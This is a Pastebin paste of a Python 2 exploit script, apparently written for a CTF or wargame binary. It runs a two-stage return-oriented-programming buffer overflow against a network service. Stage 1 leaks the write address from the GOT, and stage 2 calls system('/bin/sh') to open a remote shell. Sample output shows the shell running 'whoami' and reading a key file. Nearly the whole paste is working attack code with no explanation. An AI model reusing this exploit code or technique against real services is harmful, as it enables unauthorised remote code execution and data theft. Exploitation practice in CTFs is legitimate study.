Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import os
- import struct
- from socket import *
- import time
- def GOT_SHELL(sock):
- command=""
- while(command != 'quit'):
- command=raw_input("> ")
- sock.send(command+"\n")
- time.sleep(0.5)
- print sock.recv(0x4096)
- return
- p = lambda x : struct.pack("<L", x)
- up = lambda x : struct.unpack("<L", x)
- ip = "192.168.0.103"
- port = 12312 # my server
- s = socket(AF_INET, SOCK_STREAM)
- s.connect((ip, port))
- #write = dfcd0
- #system = 41280
- OFFSET = 0x9ea50
- freespace = 0x08049629
- ppppr = 0x080484b5
- write = 0x0804830c
- read = 0x0804832c
- write_got = 0
- system = 0
- cmd = "/bin/sh"
- sh = 0x0804867f
- ############################################################################ stage1
- payload = ""
- payload += "A"*0x88
- payload += "BBBB"
- payload += p(write) # ret
- payload += p(ppppr+1) # pppr
- payload += p(1) # stdout
- payload += p(0x08049614) # get write_got
- payload += p(4) # size
- payload += p(read) # ret
- payload += p(ppppr+1) # ppr
- payload += p(0)
- payload += p(freespace)
- payload += p(len(cmd))
- payload += p(0x0804841d) # return to vuln function
- print "[*] Sending Stage 1 . . ."
- s.send(payload)
- time.sleep(0.5)
- print "[*] Sending Command "+cmd+" . . ."
- s.send(cmd)
- write_got = up(s.recv(2048))[0]
- print "[!] system addr : "+hex(write_got)
- ############################################################################ stage2
- payload = ""
- payload += "A"*0x8c
- payload += p(write_got - OFFSET) # write system
- payload += "AAAA"
- #payload += p(sh)
- payload += p(freespace)
- #####################################################################################
- print "[*] Sending Stage 2 . . ."
- s.send(payload)
- GOT_SHELL(s)
- raw_input("Got Shell?")
- """
- C:\Users\Administrator\Desktop\sweetchip>exploit.py
- [*] Sending Stage 1 . . .
- [*] Sending Command /bin/sh . . .
- [!] system addr : 0xb7649cd0L
- [*] Sending Stage 2 . . .
- > whoami
- sweetchip
- > cat /home/sweetchip/key
- This is K3y
- >
- """
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement